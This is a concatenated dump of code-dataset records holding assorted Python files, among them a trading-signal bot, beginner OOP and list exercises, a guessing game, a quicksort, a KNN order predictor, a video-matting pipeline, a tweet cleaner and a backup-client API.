{\"EMA9\":short_ema9,\"VWMA30\":data_hour[\"VWMA30\"]}\n ema_vwma = pd.DataFrame(ema_vwma_dict)\n buy = []\n sell = []\n flag = 42\n\n for i in range(0, numpy.shape(ema_vwma)[0]):\n if ema_vwma[\"EMA9\"].iloc[i] < ema_vwma[\"VWMA30\"].iloc[i]:\n buy.append(numpy.nan)\n if flag != 1:\n sell.append(ema_vwma[\"EMA9\"].iloc[i])\n flag = 1\n else:\n sell.append(numpy.nan)\n\n elif ema_vwma[\"EMA9\"].iloc[i] > ema_vwma[\"VWMA30\"].iloc[i]:\n sell.append(numpy.nan)\n if flag != 0:\n buy.append(ema_vwma[\"EMA9\"].iloc[i])\n flag = 0\n else:\n buy.append(numpy.nan)\n else:\n buy.append(numpy.nan)\n sell.append(numpy.nan)\n\n # Buy-Sell datası oluşturma\n buysell_data = {\"Time\": data_hour[\"time\"], \"Buy\": buy, \"Sell\": sell}\n result = pd.DataFrame(buysell_data)\n index = result.iloc[:, 1:].dropna(how=\"all\").index\n result = result.iloc[index,]\n if result[\"Buy\"][0:1].isna().bool() == True:\n result = result.drop([min(index)])\n\n if numpy.isnan(result.iloc[result.shape[0] - 1,][\"Buy\"]) == False:\n databaseFile.sql_update(databaseFile.connector,items,str(result[\"Time\"].iloc[-1]),round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3),status=\"buy\")\n databaseFile.sql_update(databaseFile.connector,items,str(result[\"Time\"].iloc[-1]),\"nosignal\",status=\"sell\")\n print(items+\": buy at ----> \"+str(round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)))\n if str(round(result.iloc[result.shape[0] - 1,][\"Buy\"], 3)) != str(last_buy_signal[items]):\n print(\"bot tetiklendi\")\n bot.send_message(chat_id,items+\": buy at --> \"+str(round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)))\n last_buy_signal[items] = round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)\n time.sleep(1)\n else:\n databaseFile.sql_update(databaseFile.connector, items, str(result[\"Time\"].iloc[-1]),round((result.iloc[result.shape[0] - 1,][\"Sell\"]), 3), status=\"sell\")\n databaseFile.sql_update(databaseFile.connector, items, str(result[\"Time\"].iloc[-1]), \"nosignal\", status=\"buy\")\n print(items+\": sell at ---->:\"+str(round((result.iloc[result.shape[0] - 1,][\"Sell\"]),3)))\n if str(round(result.iloc[result.shape[0] - 1,][\"Sell\"], 3)) != str(last_sell_signal[items]):\n print(\"bot tetiklendi\")\n bot.send_message(chat_id, items + \": sell at --> \" + 
str(round((result.iloc[result.shape[0] - 1,][\"Sell\"]), 3)))\n last_sell_signal[items] = round((result.iloc[result.shape[0] - 1,][\"Sell\"]),3)\n time.sleep(1)\n\n reshaper()\n time.sleep(80)\n \n","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"472000304","text":"#dogs.py\n\n#此示例示意为属性和方法一起使用\n\nclass Dog:\n def eat(self, food):\n print(self.color, '的',\n self.kinds,'正在吃',food)\n\n#创建第一个对象\ndog1 = Dog()\ndog1.kinds = '京巴' #添加属性kinds\ndog1.color = '白色' #添加属性color\ndog1.color = '黄色' #改变color绑定关系\n#print(dog1.color,'的',dog1.kinds) #访问属性\ndog1.eat('骨头')\n\ndog2 = Dog()\ndog2.kinds = '牧羊犬'\ndog2.color = '灰色'\n#print(dog2.color,'的',dog2.kinds) #访问属性\ndog2.eat('包子')\n","sub_path":"Object Oriented/day01/04_dogs.py","file_name":"04_dogs.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417874011","text":"from jupyter_client.kernelspec import KernelSpecManager\n\nkernel_name = \"mips_asm\"\n\n\ndef uninstall_kernel():\n print(\"Uninstalling\", kernel_name, \"kernel...\")\n KernelSpecManager().remove_kernel_spec(kernel_name)\n print(kernel_name.capitalize(), \"kernel uninstallation complete\")\n\n\nif __name__ == '__main__':\n uninstall_kernel()\n","sub_path":"kernels/mips_asm/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"395995914","text":"import random\n\nprint(\"Olá, qual o seu nome?\")\nuser_nome = input()\nprint(user_nome + \", você está pronta para jogar? As regras são as seguintes: \\n 1- O número sorteado está entre 0 e 20 \\n 2- Você tem 6 chances para tentar acertar o número \\n 3- A cada erro, eu te darei uma dica de aproximação. \\nBoa sorte! \")\ncount = 1\nprint (\"Já sorteei o número.\")\nnum_sorteado = random.randint(0,20)\nprint (f\"{num_sorteado}\")\nprint (\"Digite sua aposta:\")\nnum_tentativa_user = input()\nwhile (count < 6):\n if (int(num_sorteado) < int(num_tentativa_user)):\n count += 1\n print(\"O número sorteado é menor. Tente novamente:\")\n num_tentativa_user = input()\n elif (int(num_sorteado) > int(num_tentativa_user)):\n count += 1\n print(\"O número sorteado é maior. Tente novamente:\")\n num_tentativa_user = input()\n elif (int(num_sorteado) == int(num_tentativa_user)):\n print(f\"Você acertou em {count} tentativa(s) \\nNúmero sorteado: {num_sorteado}\") \n break\nelse:\n if (int(count) == 6 and int(num_sorteado) != int(num_tentativa_user)):\n print(f\"Sinto muito, suas tentativas acabaram! \\nNúmero sorteado: {num_sorteado}\")\n elif(int(count) == 6 and int(num_sorteado) == int(num_tentativa_user)):\n print(f\"Você acertou! 
\nNúmero sorteado: {num_sorteado}\")","sub_path":"Python-Exercises/desafio02.py","file_name":"desafio02.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"15144142","text":"#!/usr/bin/env python3\n\ndef qsort(arr):\n    if len(arr) > 1:\n        pivot = arr[0]\n        upper = [x for x in arr if x > pivot]\n        equal = [x for x in arr if x == pivot]\n        lower = [x for x in arr if x < pivot]\n        result = qsort(lower) + equal + qsort(upper)\n        print(\" \".join(map(str,result)))\n        return result\n    \n    else : return arr\n\nn = int(input())\nl = list(map(int, input().split(' ')))\n\nqsort(l)\n","sub_path":"Competitive Programming/hackerrank/Algorithm/Sorting/qsort2.py","file_name":"qsort2.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106352959","text":"# -*- coding: utf-8 -*-\n\nfrom appconf import AppConf\nfrom django import template\nfrom django.conf import settings\nfrom django.template.base import TextNode\n\nfrom .. import jq_version\n\n\nregister\t\t = template.Library()\n\n\nclass _AppConf(AppConf):\n\tVERSION\t\t\t\t = jq_version\n\tCDN\t\t\t\t\t = False\n\tDEFAULT_CDN\t\t\t = 'http://code.jquery.com/jquery-%(version)s.min.js'\n\n\tSTATIC_JS\t\t\t = '%(static_url)sjquery/jquery-%(version)s.min.js'\n\n\tSCRIPT_TAG\t\t\t = '<script type=\"text/javascript\" src=\"%(url)s\"></script>'\n\n\tclass Meta:\n\t\tprefix\t\t\t = \"JQUERY\" # appconf cannot determine the prefix here!\n\n\n\n@register.tag\ndef jquery_js(parser, token):\n\tbits\t = tuple(token.split_contents()) + (None, None)\n\tversion\t = bits[1] or settings.JQUERY_VERSION\n\tcdn\t\t = settings.JQUERY_CDN\n\tif cdn:\n\t\tif cdn is True:\n\t\t\tcdn = settings.JQUERY_DEFAULT_CDN\n\t\turl\t = cdn % {'version': version}\n\telse:\n\t\turl\t = settings.JQUERY_STATIC_JS % {\n\t\t\t'static_url': settings.STATIC_URL, 'version': version}\n\n\tres\t = settings.JQUERY_SCRIPT_TAG % {'url': url}\n\treturn TextNode(res)\n\n","sub_path":"venv/Lib/site-packages/jquery/templatetags/jquery.py","file_name":"jquery.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"393069417","text":"f = open('files/day19.txt')\nimport re\n\ninp = list()\nfor line in f:\n    inp.append(line)\n\ncount = 0\ndirection ='down'\ndown = True\nright = False\nleft = False\nup = False\n\n\ndef new_direction(x,y,inp, direction):\n    if inp[y][x+1] == '-' and direction != 'left':\n        return 'right'\n    if inp[y][x-1] == '-' and direction != 'right':\n        return 'left'\n    try:\n        if inp[y-1][x] == '|' and direction != 'down':\n            return 'up'\n    except Exception:\n        print('!!!!!!!')\n        pass\n    if inp[y+1][x] == '|' and direction != 'up':\n        return 'down'\n    else:\n        return 'end'\n\ndef is_letter(char_1):\n    letters = ('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')\n\n    if char_1 in letters:\n        return True\n\ny = 0\nx = 0\n\nfor index, letter in enumerate(inp[x]):\n    if letter == '|':\n        x = index\n\n\n\nwhile direction != 'end':\n    while direction == 'down':\n        if is_letter(inp[y+1][x]):\n            y = y + 1\n            count = count + 1\n\n        if inp[y+1][x]=='|' or inp[y+1][x] == '-':\n            y = y + 1\n            count = count + 1\n\n        if inp[y+1][x]=='+':\n            y = y+1\n            count = count + 1\n\n            direction = new_direction(x,y, inp, direction)\n\n    while direction == 'up':\n        if is_letter(inp[y-1][x]):\n            y = y - 1\n            count = count + 1\n\n        if inp[y-1][x]=='|' or inp[y-1][x] == '-':\n            y = y 
- 1\n count = count + 1\n\n if inp[y - 1][x] == '+':\n y = y - 1\n count = count + 1\n\n direction = new_direction(x, y, inp, direction)\n\n\n while direction == 'right':\n if is_letter(inp[y][x+1]):\n x = x + 1\n count = count + 1\n\n if inp[y][x+1]=='|' or inp[y][x+1] == '-':\n x = x + 1\n count = count + 1\n\n if inp[y][x+1]=='+':\n x = x+1\n count = count + 1\n\n direction = new_direction(x,y, inp, direction)\n\n\n\n while direction == 'left':\n if is_letter(inp[y][x-1]):\n x = x - 1\n count = count + 1\n\n if inp[y][x-1]=='|' or inp[y][x-1] == '-':\n x = x - 1\n count = count + 1\n\n if inp[y][x-1]=='+':\n x = x-1\n count = count + 1\n\n direction = new_direction(x,y, inp, direction)\n\n print(count)\n\n","sub_path":"Day_19pt2.py","file_name":"Day_19pt2.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486203695","text":"#encoding=utf-8\nimport sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\nimport pymysql\nimport numpy as np\nimport pandas as pd \nimport operator\nimport math\nfrom numpy import *\nimport sys\nclass is_order(object):\n def __init__(self,items):\n self.items=items\n #获取数据\n self.datas=self.get_data(self.items)\n #print(self.datas[-1::-50])\n #处理数据\n self.handleDatas=self.handle_data(self.datas)\n #print(self.datas[-1::-50])\n #数据归一化\n self.normDataSet=self.autoNorm(self.handleDatas)\n #print(self.normDataSet[-1::-50])\n \n \n \n #连接数据库获取数据并转成pandas形式\n def get_data(self,items):\n conn=pymysql.connect('120.78.86.208','root',\"543998\",\"hotelsys\")\n cursor=conn.cursor()\n try:\n sql='select deskcount,price,source,age,Scene,append,is_xiadan from `order`'\n cursor.execute(sql)\n results=cursor.fetchall() #返回所有的特征列数据\n columnDes = cursor.description #获取连接对象的描述信息\n #将数据转换成pandas\n columnNames = [columnDes[i][0] for i in range(len(columnDes))] \n datas= pd.DataFrame([list(i) for i in results],columns=columnNames)\n new=pd.DataFrame({'deskcount':items['deskcount'],\n 'price':items['price'],\n 'source':items['source'],\n 'age':items['age'],\n 'Scene':items['Scene'],\n 'append':items['append']},\n index=[0])\n datas=datas.append(new,ignore_index=True)\n except Exception:\n #如果发生异常,则回滚 \n print(\"发生异常\",Exception) \n conn.rollback()\n finally: \n #最终关闭数据库连接 \n conn.close()\n return datas\n \n #处理数据\n def handle_data(self,datas):\n #处理source数据 unique() 去重\n labels=datas['source'].unique().tolist() #得到labels['female', 'male']的列表\n '''\n 循环 data['sex']取出的值为 0,1 对应到 labels['female', 'male']中判断是哪个值再去这个值所在的索引\n 通过这种方法实现了将 'female','male'转为0,1值\n '''\n datas['source']=[ *map( lambda x:labels.index(x) , datas['source'] ) ] # *解包 map映射生成一个迭代器 需要*进行序列解包\n #print(data)\n \n #处理age 同上面处理方式\n labels=datas['age'].unique().tolist()\n datas['age']=datas['age'].apply( lambda x:labels.index(x) )\n \n #处理Scene\n labels=datas['Scene'].unique().tolist()\n datas['Scene']=datas['Scene'].apply( lambda x:labels.index(x) )\n \n #处理append\n labels=datas['append'].unique().tolist()\n datas['append']=datas['append'].apply( lambda x:labels.index(x) )\n \n #处理deskcount\n datas['deskcount']=list(map( int , datas['deskcount'] ))\n \n #处理deskcount\n datas['price']=list(map( int , datas['price'] ))\n \n return datas\n \n #数据归一化\n #新的分析 在距离运算公式中 价格对结果的影响是最大的 为了避免这种影响 我们采用归一化值进行处理\n #这样每个因素对结果的权重就统一了\n # 原理:将值取范围为0到1之间的值\n #运算公式:newValue=( oldValue-min )/( max-min )\n def autoNorm( self,datas ):\n minVals=datas.min(0) #min( num ):num为0表示每列的最小值 num为1表示每行的最小值\n 
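# column-wise maxima; with minVals this gives ranges = max - min, the denominator of newValue = (oldValue - min) / (max - min)\n        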
maxVals=datas.max(0)\n ranges=maxVals-minVals\n normDataSet=np.zeros( np.shape(datas) )\n m=datas.shape[0]\n normDataSet=datas-np.tile( minVals,(m,1) ) #[价格的最小值]\n normDataSet=normDataSet/np.tile( ranges,(m,1) )\n return normDataSet\n \n \n #高斯函数\n def gaussian(self,dist,a=1,b=0,c=0.3):\n return a*math.e**( -(dist-b) ** 2 / ( 2*c**2 ) )\n #反函数\n def reservefun( self,distance,const ):\n return 1/( distance+const)\n #KNN分类判断用户是否下单\n #flag=isOrder.myKNeighborsClassifier( inX,features,lables )\n def myKNeighborsClassifier(self,inX,dataSet,lables,n_neighbors=5,weights='distance',p=2):\n dataSetSize=dataSet.shape[0] #求出数据集数据的行数\n #print(dataSetSize)\n #求出输入向量inX与数据集中各样本的距离(将输入向量复制行数与dataSet一样)\n# print( type(np.tile( inX,( dataSetSize,1 ) ) ))\n# print( np.tile( inX,( dataSetSize,1 ) ) )\n# print( type(dataSet) )\n# print( dataSet) \n# diffMat= np.array(np.tile( inX,( dataSetSize,1 ) ))-dataSet\n inX=np.array(np.tile( inX,( dataSetSize,1 ) ))\n #print(type(inX))\n #print(inX)\n # print( type(dataSet) )\n #print(type(dataSet))\n diffMat=inX-dataSet\n sqDiffMat=diffMat**p #秋平方\n sqDistances=sqDiffMat.sum( axis=1 ) #求和\n distances=sqDistances**( 1/p ) #开平方根\n \n '''\n p=1 : 曼哈顿距离\n p=2: 欧式距离\n p=∞ 它是各个坐标距离的最大值\n '''\n \n if weights=='distance':\n #采用距离加权法重新计算\n # 方案一: 反函数 weight=1/(distance+const) const任意常数 1就可\n #方案二: 高斯函数 f(x)=a*e^( -(x-b)^2/2c^2 )\n distances=self.gaussian( distances )\n elif weights=='uniform':\n distances=self.reservefun( distances,1 )\n \n sorteDistIndicies=distances.argsort() #numpy.argsort 返回对数组排序后的索引\n classCount={} #3:10 2:4 5:19\n \n #求出前k个数据的标签 并统计\n for i in range(n_neighbors):\n voteIlabel=lables[ sorteDistIndicies[i] ] #取出标签值 此sortedDistIndicies[i]表示第几个标签 是数字\n classCount[voteIlabel]=classCount.get( voteIlabel,0 )+1 #对每一个label进行计数\n # python2对字典的操作: classCount.iteritems() python3 classCount.items()\n sortedClassCount=sorted( classCount.items(),key=operator.itemgetter(1),reverse=True )\n #print( '',sortedClassCount )\n return sortedClassCount[0][0]\n \nif __name__=='__main__':\n\n if len(sys.argv) > 5:\n deskcount = sys.argv[1]\n price = sys.argv[2]\n source = sys.argv[3]\n age = sys.argv[4]\n Scene = sys.argv[5]\n append = sys.argv[6]\n items = {'deskcount': deskcount, 'price': price, 'source': source, 'age': age,\n 'Scene': Scene,\n 'append': append}\n isOrder=is_order(items)\n normDataSet=isOrder.normDataSet\n #print(normDataSet,'------------')\n lables=normDataSet['is_xiadan'][0:-1].values\n features=normDataSet.drop( ['is_xiadan'] ,axis=1).values[0:-1]\n #print(features,'***************')\n inX=normDataSet.drop(['is_xiadan'] ,axis=1).values[-1]\n flag=isOrder.myKNeighborsClassifier(inX, features, lables)\n print(flag)\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"源代码/FoodStreet/src/PythonFile/isOrder.py","file_name":"isOrder.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14063968","text":"import math\nimport multiprocessing\nimport re\nimport subprocess as sp\nimport time\nimport ffmpeg\nimport numpy as np\nimport torch\nimport sys\nfrom bg import DEVICE, Net, iter_frames, remove_many\n\n\ndef worker(worker_nodes,\n worker_index,\n result_dict,\n model_name,\n gpu_batchsize,\n total_frames,\n frames_dict):\n print(F\"WORKER {worker_index} ONLINE\")\n\n output_index = worker_index + 1\n base_index = worker_index * gpu_batchsize\n net = Net(model_name)\n script_net = None\n for fi in (list(range(base_index + i * worker_nodes * gpu_batchsize,\n 
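# each worker takes gpu_batchsize-sized chunks strided by worker_nodes * gpu_batchsize frames; min(...) clamps the final chunk to total_frames\n                                               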
min(base_index + i * worker_nodes * gpu_batchsize + gpu_batchsize, total_frames)))\n for i in range(math.ceil(total_frames / worker_nodes / gpu_batchsize))):\n if not fi:\n break\n\n # are we processing frames faster than the frame ripper is saving them?\n last = fi[-1]\n while last not in frames_dict:\n time.sleep(0.1)\n\n input_frames = [frames_dict[index] for index in fi]\n if script_net is None:\n script_net = torch.jit.trace(net,\n torch.as_tensor(np.stack(input_frames), dtype=torch.float32, device=DEVICE))\n\n\n result_dict[output_index] = remove_many(input_frames, script_net)\n\n # clean up the frame buffer\n for fdex in fi:\n del frames_dict[fdex]\n output_index += worker_nodes\n\n\ndef capture_frames(file_path, frames_dict, prefetched_samples, total_frames):\n print(F\"WORKER FRAMERIPPER ONLINE\")\n for idx, frame in enumerate(iter_frames(file_path)):\n frames_dict[idx] = frame\n while len(frames_dict) > prefetched_samples:\n time.sleep(0.1)\n if idx > total_frames:\n break\n\n\ndef parallel_greenscreen(file_path,\n worker_nodes=1,\n gpu_batchsize=4,\n model_name='u2net_human_seg',\n frame_limit=-1,\n prefetched_batches=4,\n framerate=-1):\n multiprocessing.set_start_method('spawn', force=True)\n manager = multiprocessing.Manager()\n\n results_dict = manager.dict()\n frames_dict = manager.dict()\n\n print(file_path)\n\n info = ffmpeg.probe(file_path)\n total_frames = int(info[\"streams\"][0][\"nb_frames\"])\n\n if frame_limit != -1:\n total_frames = min(frame_limit, total_frames)\n\n fr = info[\"streams\"][0][\"r_frame_rate\"]\n\n if framerate == -1:\n print(F\"FRAME RATE DETECTED: {fr} (if this looks wrong, override the frame rate)\")\n framerate = math.ceil(eval(fr))\n\n print(F\"FRAME RATE: {framerate} TOTAL FRAMES: {total_frames}\")\n\n p = multiprocessing.Process(target=capture_frames,\n args=(file_path, frames_dict, gpu_batchsize * prefetched_batches, total_frames))\n p.start()\n\n # note I am deliberatley not using pool\n # we can't trust it to run all the threads concurrently (or at all)\n workers = [multiprocessing.Process(target=worker,\n args=(worker_nodes, wn, results_dict, model_name, gpu_batchsize, total_frames,\n frames_dict))\n for wn in range(worker_nodes)]\n for w in workers:\n w.start()\n\n command = None\n proc = None\n frame_counter = 0\n for i in range(math.ceil(total_frames / worker_nodes)):\n for wx in range(worker_nodes):\n\n hash_index = i * worker_nodes + 1 + wx\n\n while hash_index not in results_dict:\n time.sleep(0.1)\n\n frames = results_dict[hash_index]\n # dont block access to it anymore\n del results_dict[hash_index]\n\n for frame in frames:\n if command is None:\n command = ['ffmpeg',\n '-y',\n '-f', 'rawvideo',\n '-vcodec', 'rawvideo',\n '-s', F\"{frame.shape[1]}x320\",\n '-pix_fmt', 'gray',\n '-r', F\"{framerate}\",\n '-i', '-',\n '-an',\n '-vcodec', 'mpeg4',\n '-b:v', '2000k',\n re.sub(r\"\\.(mp4|mov|avi)\", r\".matte.\\1\", file_path, flags=re.I)]\n\n proc = sp.Popen(command, stdin=sp.PIPE)\n\n proc.stdin.write(frame.tostring())\n frame_counter = frame_counter + 1\n\n if frame_counter >= total_frames:\n p.join()\n for w in workers:\n w.join()\n proc.stdin.close()\n proc.wait()\n print(F\"FINISHED ALL FRAMES ({total_frames})!\")\n return\n\n p.join()\n for w in workers:\n w.join()\n proc.stdin.close()\n proc.wait()\n","sub_path":"u2net/multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636511797","text":"# My 
implementation of the coding challenge\n# -*- coding: UTF-8 -*-\n# TO DO:\n# Identify non-ASCII codes in a Unicode string\n\nimport io\nimport os\nimport sys\nimport json\nimport codecs\nimport string\n\n#import future # requires pip install\nfrom os import path\n\ndef isUnicode(s):\n    # if encoding and decoding equals the original,\n    # then it doesn't have special characters\n    encoded_text = s.encode(\"ascii\", \"ignore\")\n    decoded_text = encoded_text.decode('utf-8')\n    if decoded_text == s:\n        return False\n    return True\n    \nif __name__ == \"__main__\":\n    \n\n    #0.1 input parameters\n    RAW_TWEETS_FILE = sys.argv[1]\n    CLEANED_TWEETS_FILE = sys.argv[2]\n    \n    with io.open(RAW_TWEETS_FILE,encoding='utf-8') as f: \n        Unicode_Tweets_Count = 0; \n        \n        raw_tweet_text = \"\"\n        created_at_text = \"\"\n        if path.isfile(CLEANED_TWEETS_FILE):\n            try:\n                os.remove(CLEANED_TWEETS_FILE)\n            except OSError:\n                pass\n        \n        fout = open(CLEANED_TWEETS_FILE,\"a+\",)\n        print('Starting the first part of the challenge')\n        \n        for line in f:\n            tweet = json.loads(line)\n            #1.1 Extract text from the tweet\n            \n            # Checking if that is a valid tweet:\n            if 'text' in tweet:\n                \n                raw_tweet_text = tweet['text']\n                raw_tweet_text = raw_tweet_text.replace('\\n', ' ')\n                raw_tweet_text = raw_tweet_text.replace('\\t', ' ')\n\n                encoded_tweet_text = raw_tweet_text.encode(\"ascii\", \"ignore\")\n                no_white_space_tweet = encoded_tweet_text.strip()\n\n                if isUnicode(raw_tweet_text):\n                    Unicode_Tweets_Count +=1\n                \n                #1.3 Extract timestamp: \n                timestamp_text = \" (timestamp: \" + tweet['created_at'] + \")\"\n                \n                fout.write(no_white_space_tweet + timestamp_text + \"\\n\")\n        \n        # close the file when done\n        fout.write('\\n' + str(Unicode_Tweets_Count) + \" tweets contained unicode\")\n        fout.close()\n        \n        #print \"the file had \" + str(linecount) + \" tweets\" # DEBUG LINE\n        #print str(Unicode_Tweets_Count) + \" tweets contained unicode\" # DEBUG LINE\n        ","sub_path":"src/tweets_cleaned.py","file_name":"tweets_cleaned.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396918231","text":"import json\nimport zlib\nfrom random import random\nfrom httplib import HTTPSConnection\nfrom hashlib import sha512 as sha\nfrom urllib import urlencode\n\nfrom config import config, status as client_status\n\n\nclass Api(object):\n    BOUNDARY = '-' * 20 + sha(str(random())).hexdigest()[:20]\n    \n    def __init__(self, host, port, uuid, key):\n        self.conn = HTTPSConnection(host, port)\n        self.base_params = {'uuid': uuid, 'key': key}\n    \n    def _send(self, path, data={}, files={}, method='POST'):\n        data.update(self.base_params)\n        headers = {'Accept': 'text/plain'}\n        url = '/api/%s/' % path\n        if files:\n            body = self.encode_multipart_data(data, files)\n            headers['Content-type'] = 'multipart/form-data; boundary=%s' % Api.BOUNDARY\n            method = 'POST'\n        else:\n            body = urlencode(data)\n            headers['Content-type'] = 'application/x-www-form-urlencoded'\n            if method == 'GET':\n                url = '%s?%s' % (url, body)\n                body = None\n        self.conn.request(method, url, body, headers)\n        response = self.conn.getresponse()\n        result = (response.status, response.read())\n        self.conn.close()\n        return result\n    \n    def encode_multipart_data(self, data={}, files={}):\n        \"\"\" Returns multipart/form-data encoded data\n        \"\"\"\n        boundary = '--' + Api.BOUNDARY\n        crlf = '\\r\\n'\n        \n        data_tpl = crlf.join((boundary,\n                              'Content-Disposition: form-data; name=\"%(name)s\"',\n                              '',\n                              '%(value)s'))\n\n        file_tpl = crlf.join((boundary,\n                              
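# like data_tpl above, but declares a filename and a binary (octet-stream) content type\n                              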
'Content-Disposition: form-data; name=\"%(name)s\"; filename=\"%(name)s\"',\n 'Content-Type: application/octet-stream',\n '',\n '%(value)s'))\n \n def render(tpl, data):\n return [tpl % {'name': key,\n 'value': value} for key, value in data.iteritems()]\n \n result = render(data_tpl, data)\n if files:\n result.extend(render(file_tpl, files))\n result.append('%s--\\r\\n' % boundary)\n return crlf.join(result)\n \n def hi(self, uname):\n return self._send('hi', {'host': uname[1], 'uname': ' '.join(uname)})\n \n def set_fs(self, fs):\n return self._send('fs/set', files={'fs': zlib.compress(fs, 9)})\n \n def update_fs(self, changes):\n changes = zlib.compress(json.dumps(changes), 9)\n return self._send('fs/update', files={'changes': changes})\n \n def upload_log(self, entries):\n if len(entries) > 1:\n kwargs = {'files': {'entries': zlib.compress(';'.join(entries), 9)}}\n else:\n kwargs = {'data': {'entries': entries[0]}}\n return self._send('log', **kwargs)\n \n def get_schedule(self):\n data = {}\n if client_status.schedule:\n data['v'] = client_status.schedule['version']\n status, content = self._send('backup/schedule',\n data=data,\n method='GET')\n if status == 200:\n content = json.loads(content)\n return status, content\n \n def get_files(self):\n data = {}\n if client_status.files_hash:\n data['fhash'] = client_status.files_hash\n return self._send('backup/files', data=data, method='GET')\n\n def get_s3_access(self):\n status, content = self._send('backup/access', method='GET')\n if status == 200:\n content = json.loads(content)\n return status, content\n \n def set_backup_info(self, status, **kwargs):\n backup_id = kwargs.pop('backup_id', None)\n allowed = ('time', 'size', 'keyname', 'files')\n data = {k: v for k, v in kwargs.iteritems() if k in allowed}\n if backup_id:\n data['id'] = backup_id\n s, c = self._send('backup/%s' % status, data)\n if not backup_id and s == 200:\n c = int(c)\n return s, c\n \n def set_databases(self, databases):\n return self._send('databases', data={'db': json.dumps(databases)})[0]\n\n def report_crash(self, info, when):\n return self._send('crash',\n data={'time': when},\n files={'info': zlib.compress(info, 9)})[0]\n \n def check_restore(self):\n status, content = self._send('backup/restore', method='GET')\n if status == 200 and content:\n content = json.loads(content)\n return status, content\n\n def restore_complete(self, tasks):\n return self._send('backup/restore/complete',\n data={'tasks': ','.join(map(str, tasks))})[0]\n\n\napi = Api(config.host, config.port, config.uuid, client_status.key)\n","sub_path":"bitcalm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"639748310","text":"from nameserver import NameServer\nfrom dataserver import DataServer\n\nnumReplicate = 3\n\ndef main():\n global numReplicate\n ns = NameServer(numReplicate)\n ds1 = DataServer(\"node1\")\n ds2 = DataServer(\"node2\")\n ds3 = DataServer(\"node3\")\n ds4 = DataServer(\"node4\")\n \n ns.add(ds1)\n ns.add(ds2)\n ns.add(ds3)\n ns.add(ds4)\n\n ds1.start()\n ds2.start()\n ds3.start()\n ds4.start()\n\n # print(\"===\")\n ns.operator()\n '''\n print(\"?????\")\n ds1.join()\n ds2.join()\n ds3.join()\n ds4.join()\n '''\n\n return 0\n\nif __name__ == '__main__':\n main()\n","sub_path":"proj3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"259754854","text":"# 1. Stwórz listę przedmiotów, które zabierzesz na samotną wyprawę w góry. Elementy na liście posortuj alfabetycznie,\r\n# a następnie wyświetl.\r\ntrip = ['namiot', 'śpiwór', 'siekiera']\r\nprint(sorted(trip))\r\n\r\n# 2. Pobierz od użytkownika 10 liczb, wyświetl tylko te, które są nieparzyste.\r\nfew = []\r\nfewpar = []\r\n\r\nfor i in range(1, 11):\r\n few.append(int(input(f\"Podaj {i}-ą liczbę: \")))\r\n\r\nfewpar = []\r\nprint(few)\r\nfor x in range(10):\r\n if few[x] % 2 == 0:\r\n fewpar.append(few[x])\r\n\r\nprint(f'Liczbami parzytymi są {fewpar}.')\r\n\r\n# 3. Dla podanej przez użytkownika liście liczb całkowitych sprawdź czy pierwszy i ostatni element są takie same.\r\nlistln = input('Wpisz kilka liczb rozdielonych przecinkiem:')\r\nlistln = listln.split(',')\r\n\r\nif listln[0] == listln[-1]:\r\n print('Taki sam.')\r\nelse:\r\n print(\"Różne.\")\r\n# 4. Pobierz od użytkownika parzystą listę elementów. Sprawdź czy 2 środkowe elementy są takie same.\r\nfew = input('Wpisz 10 liczb rozdielonych przecinkiem:')\r\nfew2 = few.split(',')\r\nhow_many = len(few2)\r\nmid = int(how_many / 2)\r\nprint(few2, mid)\r\nif few2[mid-1] == few2[mid]:\r\n print(f\"Środkowe elementy {few2[mid-1]} oraz {few2[mid]} są takie same!\")\r\nelse:\r\n print(f\"Środkowe elementy {few2[mid-1]} oraz {few2[mid]} nie są takie same!\")\r\n\r\n# 5.Utwórz “na sztywno” 2-wymiarową tablicę, tak, by kolejne wiersze zawierały dane osób, natomiast w kolumnach będzie\r\n# znajdować się imię, nazwisko, zawód, np:\r\n# Dorota, Wellman, dziennikarka\r\n# Adam, Małysz, sportowiec\r\n# Robert, Lewandowski, piłkarz\r\n# Krystyna, Janda, aktorka\r\n# Wyświetl w sposób przyjazny dla użytkownika\r\nlist2D = [\r\n ['Dorota', 'Wellman', 'dziennikarka'],\r\n ['Adam', 'Małysz', 'sportowiec'],\r\n 